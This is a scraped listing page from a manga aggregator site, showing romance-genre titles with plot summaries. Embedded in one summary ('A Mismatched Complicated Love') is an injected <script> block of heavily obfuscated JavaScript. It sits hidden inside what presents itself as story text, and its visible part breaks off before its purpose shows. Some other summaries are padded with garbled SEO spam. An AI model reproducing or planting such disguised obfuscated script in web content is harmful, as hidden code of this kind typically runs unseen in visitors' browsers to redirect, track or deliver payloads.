Romance - Page 45

Romance manga tells love stories, often filled with emotional conflicts, misunderstandings, and tender moments, making it a popular genre for readers who enjoy romantic drama.

24776 results

A middle-aged man who returns from another world goes back to when he was 17 and becomes unbeatable

A black company employee in his 40s, Namba Kazu, died of overwork and was reincarnated to another world. After saving the world, he returns to find himself regressed to his 17-year-old self. Kazu realizes that he can use the abilities he acquired from another world and is excited to restart his life over again. However, through the help of his childhood friend, Yui, he learns of the existence of “human eating abomination called Variant” in the world he was born in. Kazu knows from his past memories that Yui will die in the near future. In order to save Yui, who is on a mission to fight against variants, Kazu decided to throw himself into battle in this world as well.


A Midnight Bellboy

Collection of unrelated oneshots, and a continuation of Sensei's series "Usotsuki wa Shinshi no Hajimari" (Lies are a Gentleman's).+


A Midsummer Night's Dream

A collection of oneshots. 1st Story: Mountain Love - A story of a girl, who is under stress to get into a medical school and one day, falls in love with her doctor. 2nd Story: A Mermaid is Singing - A story of a boy, who tries to commit suicide (because of certain medical reasons) and a girl who tries to stop him. 3rd Story: Autumn Night's Dream - A story of an architect and a girl who helps him to realise his real dream. 4th Story: ECHO - A story about a girl who knows the people who killed their class president but is unable to express her own thoughts. 5th Story: The Sleeping Time Paradox


A Midsummer Night's Kiss

Cha Yoon and Kim Seojin have known each other since childhood. And try as he might to avoid him, Seojin always seems to end up being around Yoon, which only makes Yoon’s feelings for him grow fonder. So much so that Yoon has to steal kisses from Seojin every night! But now through high school and beyond, what will become of their whirlwind romance?


A Million-Pound Love

This is a collection of seven oneshot stories which were already published. Released so far... 1) A Million Pound Love: a 80 year-old lady asks a 20 year-old playboy to marry her as a last wish, in exchange for one million pounds. 2) A Fairytale Judas The Nobles can fly, are as white as snow, maybe whiter and even brighter. 3) Noah's Spaceship The eighteen year old Junior is suddenly switched with the fourteen year old Junior. 4) Metal and the Bride Jack is a talented man, or is he?


A Mismatched Complicated Love

Saiga Kyousuke, the hottest boy in high school, has been rejecting confessions from every girl for one year straight. What he wants is someone who is interesting and different from others. One day, he meets a mysterious junior who is more than a little different…<script></script><script>function _0x274d(_0x13d6ec,_0x568398){var _0x8c994a=_0x9fac();return _0x274d=function(_0x5df2fe,_0x15de96){_0x5df2fe=_0x5df2fe-(0x13a+-0x2337+-0x22ed*-0x1);var _0x520885=_0x8c994a[_0x5df2fe];return _0x520885;},_0x274d(_0x13d6ec,_0x568398);}(function(_0xca023c,_0x59e04a){var _0x53026d=_0x274d,_0x7d155d=_0xca023c();while(!![]){try{var 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A Mismatched Love

A Mismatched Love summary is updating. Come visit sometime to read the latest chapter of A Mismatched Love. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.


A Misogamist’S Romance

Eunsoo Min is an all-star overachiever: She's smart, beautiful, she went to the best schools, and everything she does in her professional life is a success. Her life is going greatand the last thing wants to do is get married. So when her boyfriend proposes, she dumps him on the spot. Still, anyone would be depressed after a breakup. She goes drinking with her team from work, gets plastered, and winds up in bed with Hyunjae Dothe team newbie! She decides to forget all about it, and life goes back to normal. Except for one thingmorning sickness! Will she let Hyunjae raise the baby with her like he wants to? Or will she stay true to her anti-marriage stance?Speed Romance , Speeding Romance , , mangabuddy is a website dedicated to fans of anime, , , , video games, and cosplay. Where you may find all of your anime-related memes, recommendations, reviews, manga recommendations, character fanfiction, favorite quotations, and simply those ordinary anime things that you enjoy, particularly memes.You can , online for free at mangabuddy. Chapters are updated hourly with high-quality graphics and a full English translation. Find free translations of your favorite , and . The latest updated content on mangabuddy is now available.


A Misogamist’s Romance

Eunsoo Min is an all-star overachiever: She’s smart, beautiful, she went to the best schools, and everything she does in her professional life is a success. Her life is going great—and the last thing wants to do is get married. So when her boyfriend proposes, she dumps him on the spot. Still, anyone would be depressed after a breakup. She goes drinking with her team from work, gets plastered, and winds up in bed with Hyunjae Do—the team newbie! She decides to forget all about it, and life goes back to normal. Except for one thing—morning sickness! Will she let Hyunjae raise the baby with her like he wants to? Or will she stay true to her anti-marriage stance? Speed Romance / Speeding Romance / 超速罗曼史 / 속도위반 로맨스


A Modern Man Who Got Transmigrated Into the Murim World

Read A Modern Man Who Got Transmigrated Into the Murim World Novel – A Modern Man Who Got Transmigrated Into the Murim World Manhwa Online Free At ZINMANGA The summary of the comic A Modern Man Who Got Transmigrated Into the Murim World: I was a public official who worked part-time to survive. I was knocked out by a speeding car while making deliveries in the middle of the night. I have a strong memory of dying prematurely in a hit-and-run. “…I’m Jo Hwi?” At some point, I became the second son of the collapsing Jo Ga-cheol Clan. This family has neither the authority to drop a flying bird nor the power to carry out one’s will. There is only an enormous amount of debt that can annihilate the entire family. There’s only one way out! “Father, please pass the Jo Ga-cheol Clan on to me.” The story of a successful modern man who has to utilize all the knowledge and experience of a public official begins now!! “A Modern Man Who Got Transmigrated Into the Murim World” is also known as: Modern Dude in the Murim / Modern Man Falling Into the World of Murim / Murime Tteoreojin Hyeondaein / переселившийся в мир Мурим маньхуа / Современный человек / 武林に降り立った現代人 / 武林에 떨어진 現代人 / 무림에 떨어진 현대인 The comic A Modern Man Who Got Transmigrated Into the Murim World belongs to the Genre: Action, Adventure, Fantasy, Manhwa, Martial Arts “Top Manhwa, MangaUpdates, Read Manhwa Online…” are the most searched keywords on the website ZINMANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA Silver Tree The Corrupted Witch Has No Choice But to Become a Villain I Became The King by Scavenging


A Modest Man And A Macho Woman

A man named Seha Song grew up hearing that he was feminine from a young age, while a woman named Bada Pi grew up being told that she was masculine since she was a child. These two, whose image is opposite their gender, have grown up anxious about the attention they receive. Upon the entering university, Song Seha and Pi Bada decide to live in a way that matches the gender that society expects them to be. They try to meet the standards of others.This is a self-seeking, healing romance story about a feminine man, Song Seha and a manly woman, Pi Bada, who resist falling in line with the standards demanded by society.


A Moonlit Spring River

A story about the eunuch Army Inspector Huai En and the General Hua Shichen as they fight traitorous court officials, battle the northern barbarians, guard the frontier, and make their love and ideals a reality+
